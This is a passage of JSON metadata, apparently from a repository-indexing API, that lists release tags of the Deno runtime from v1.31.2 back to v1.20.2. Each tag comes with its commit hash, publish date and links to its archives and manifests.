fests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"